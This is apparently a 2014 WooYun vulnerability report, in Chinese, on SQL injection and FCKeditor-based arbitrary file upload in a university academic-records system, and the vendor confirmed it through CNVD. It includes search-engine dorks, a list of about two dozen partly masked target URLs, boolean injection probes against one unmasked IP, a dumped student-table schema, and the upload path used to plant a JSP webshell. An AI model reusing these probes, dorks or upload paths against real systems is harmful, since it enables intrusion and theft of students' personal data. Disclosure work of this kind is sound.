当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054065

漏洞标题:某教务系统通用Oracle注入&任意文件上传

相关厂商:Cncert国家互联网应急中心

漏洞作者: U神

提交时间:2014-03-20 10:35

修复时间:2014-05-04 10:36

公开时间:2014-05-04 10:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-20: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商已经确认,细节仅向厂商公开
2014-03-30: 细节向第三方安全合作伙伴开放
2014-05-21: 细节向核心白帽子及相关领域专家公开
2014-05-31: 细节向普通白帽子公开
2014-06-10: 细节向实习白帽子公开
2014-05-04: 细节向公众公开

简要描述:

详细说明:

#1.该套"JSP+Oracle"的CMS主要用于大学、职业技术学校的教务系统,有不少大学(包括中国药科大学教务处)也在使用该套系统,其系统含有SQL注入漏洞和一个任意文件上传漏洞,导致不仅仅可以注入,也可以上传JSP脚本木马。通过谷歌、百度、搜狗等搜索引擎可以爬行到大量使用该教务系统的网站。

Google or Baidu
inurl:ACTIONSHOWNEWS
inurl:ACTIONSHOWNEWS.APPPROCESS


#2.注入点主要是在:“ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=”,其中NewsID存在注入,以下枚举二十多例存在该系统的站点供Cncert测试。

http://jw.***.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 
http://jwcweb.***u.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1361 
http://***c.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1521 
http://ea.***m.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=2381 
http://edu.***c.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=4023 
http://218.61.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=124 
http://jwc.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081 
http://211.82.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244  
http://jiaowu.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410 
http://www1.***y.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181 
http://www.***y.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61 
http://cityjw.***.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163 
http://121.22.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270 
http://218.7.***.***:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61  
http://202.97.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241 
http://202.119.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436  
http://jwk.d***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482 
http://gz.s***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301 
http://jwgl.***u.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461 
http://59.73.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563
下面这几个没有发布新闻,所以没ID:
http://123.233.***.***:8080/index.jsp
http://218.8.**.***:8888/ACTIONSHOWFILES.APPPROCESS?mode=1
http://202.198.***.***/ 	
http://221.211.***.***/ACTIONSHOWFILES.APPPROCESS?mode=1


以下是注入证明,例如“中国某大学教务处”,

http://202.***.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=1 正常


QQ截图20140623191817.png


http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=2 出错


QQ截图20140623191817.png


600多个表:

QQ截图20140623191817.png


Table: BASE_STUDENT  ←-----------------------------------学生表的字段
[91 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| BANKID           | VARCHAR2 |
| BIRTHADDRESSNO   | VARCHAR2 |
| BIRTHDATE        | DATE     |
| BLOODNO          | VARCHAR2 |
| CLASSNO          | VARCHAR2 |
| COLLEGENO        | VARCHAR2 |
| COMEDATE         | DATE     |
| COMEYEAR         | NUMBER   |
| CONVERSTATUSNO   | VARCHAR2 |
| COUNTRYNO        | VARCHAR2 |
| CREDITSTATUSNO   | VARCHAR2 |
| DEGREELETTERNO   | VARCHAR2 |
| DEGREENO         | VARCHAR2 |
| DEPARTMENT       | VARCHAR2 |
| DEPTNO           | VARCHAR2 |
| DISPLOMANO       | VARCHAR2 |
| ECARDPASS        | VARCHAR2 |
| EMAILADDRESS     | VARCHAR2 |
| ENGLISHNAME      | VARCHAR2 |
| EXAMNO           | VARCHAR2 |
| FAITHNO          | VARCHAR2 |
| FILE_CARD        | VARCHAR2 |
| FOREIGNLANGUAGE  | VARCHAR2 |
| FOREIGNLANLEVEL  | VARCHAR2 |
| GRADEYEAR        | NUMBER   |
| GRADUATENO       | VARCHAR2 |
| HEALTHNO         | VARCHAR2 |
| HKNO             | VARCHAR2 |
| ID               | NUMBER   |
| ID_CARD          | VARCHAR2 |
| IDKINDNO         | VARCHAR2 |
| IFGRADUATE       | NUMBER   |
| IFHAVEDEGREE     | NUMBER   |
| INPOS            | VARCHAR2 |
| ISTEACHMODIFY    | NUMBER   |
| LETTERMODENO     | VARCHAR2 |
| LIBRARY_CARD     | VARCHAR2 |
| LIVEROOM         | VARCHAR2 |
| MAILADDRESS      | VARCHAR2 |
| MAJORDIRECTIONNO | VARCHAR2 |
| MAJORLEVEL       | VARCHAR2 |
| MAJORNO          | VARCHAR2 |
| MAJORSUBJECTNO   | VARCHAR2 |
| MARRYNO          | VARCHAR2 |
| MEMOS            | VARCHAR2 |
| NAME             | VARCHAR2 |
| NATIVE           | VARCHAR2 |
| NATIVENO         | VARCHAR2 |
| NOCHECKREASON    | VARCHAR2 |
| NODEGREEREASON   | VARCHAR2 |
| NOWADDRESS       | VARCHAR2 |
| OPERNO           | VARCHAR2 |
| OPERTIME         | DATE     |
| POLITICALID      | VARCHAR2 |
| POSTALCODE       | VARCHAR2 |
| RACEID           | VARCHAR2 |
| RECRUITNO        | VARCHAR2 |
| REGISTPLACE      | VARCHAR2 |
| REGSTATUS        | NUMBER   |
| RICE_CARD        | VARCHAR2 |
| SEASONNO         | VARCHAR2 |
| SEX              | VARCHAR2 |
| SEXID            | VARCHAR2 |
| SORTGRADE        | NUMBER   |
| SPECIALPOWER     | VARCHAR2 |
| SPECNO           | VARCHAR2 |
| SPELLNAME        | VARCHAR2 |
| STUDENTID        | VARCHAR2 |
| STUDENTNAME      | VARCHAR2 |
| STUDENTNO        | VARCHAR2 |
| STUDENTNOCW      | VARCHAR2 |
| STUDENTNOOLD     | VARCHAR2 |
| STUDENTSTATUS    | NUMBER   |
| STUDENTTYPENO    | VARCHAR2 |
| STUDYDIRECTNO    | VARCHAR2 |
| STUFROMAREA      | VARCHAR2 |
| STUHOMEPAGE      | VARCHAR2 |
| STUPHOTO         | BLOB     |
| TEACHCLASSNO     | VARCHAR2 |
| TELNO            | VARCHAR2 |
| TOSTATION        | VARCHAR2 |
| TRAINMODENO      | VARCHAR2 |
| TUTORNO          | VARCHAR2 |
| USEDNAME         | VARCHAR2 |
| XKENDTIME        | DATE     |
| XKFORCESELECTED  | NUMBER   |
| XKIFENABLE       | NUMBER   |
| XKPHASENO        | VARCHAR2 |
| XKSTARTTIME      | DATE     |
| XSBAT            | VARCHAR2 |
| YEARLIMIT        | NUMBER   |
+------------------+----------+


不深入了,太多了懒得跑了~后台好像是:

http://edu.***.com/Main.jsp


QQ截图20140623191817.png

漏洞证明:

#3.另外说到该系统的任意文件上传,不过有大多管理员还是聪明的删掉了,但还是有存在FckEditor编辑器的导致可以上传任意JSP脚本木马,编辑器漏洞地址:

http://edu.***.cn/FCKeditor/editor/filemanager/browser/default/browser.html?connector=./connectors/jsp/connector


例如一下:

QQ截图20140623191817.png


QQ截图20140623191817.png


QQ截图20140623191817.png


QQ截图20140623191817.png


#4.有编辑器的地方就是跑马场!下面是测试的Shell~

QQ截图20140623191817.png


修复方案:

PS:测试的Shell(zone.jsp)已删除,看了下有编辑器的地方都成了跑马场了~感觉这系统必须淘汰!顺便说一下,看看Cncert能否找到学生注册的地方,注册一个用户进去,可能那里也有上传漏洞~之前好像看到了一个,但是忘记在哪里了~

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-27 22:14

厂商回复:

CNVD确认所述情况,验证过程由上海交通大学协助完成,同时根据验证结果已经由CNVD转报给教育网应急组织——赛尔网络公司(CCERT直属)

最新状态:

暂无